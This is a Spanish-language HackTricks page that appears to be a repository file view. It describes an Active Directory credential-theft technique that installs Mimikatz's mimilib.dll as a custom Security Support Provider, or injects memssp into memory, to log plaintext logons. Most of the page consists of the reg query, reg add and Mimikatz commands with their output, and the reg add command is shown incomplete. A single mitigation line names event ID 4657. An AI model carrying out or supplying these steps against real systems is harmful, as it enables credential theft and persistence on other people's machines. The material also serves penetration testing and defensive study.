hacktricks/windows-hardening/active-directory-methodology/custom-ssp.md
carlospolop 63bd9641c0 f
2023-06-05 20:33:24 +02:00

4.7 KiB

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

SSP personalizado

Aprende qué es un SSP (Proveedor de soporte de seguridad) aquí.
Puedes crear tu propio SSP para capturar en texto claro las credenciales utilizadas para acceder a la máquina.

Mimilib

Puedes usar el binario mimilib.dll proporcionado por Mimikatz. Esto registrará en un archivo todas las credenciales en texto claro.
Coloca el archivo dll en C:\Windows\System32\
Obtén una lista de los paquetes de seguridad LSA existentes:

{% code title="atacante@objetivo" %}

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
    Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

{% endcode %}

Agrega mimilib.dll a la lista de proveedores de soporte de seguridad (Security Packages):

PS C:\> reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

Y después de un reinicio, todas las credenciales pueden encontrarse en texto claro en C:\Windows\System32\kiwissp.log

En memoria

También se puede inyectar directamente en memoria usando Mimikatz (ten en cuenta que puede ser un poco inestable/no funcionar):

privilege::debug
misc::memssp

Esto no sobrevivirá a reinicios.

Mitigación

ID de evento 4657 - Auditoría de creación/cambio de HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥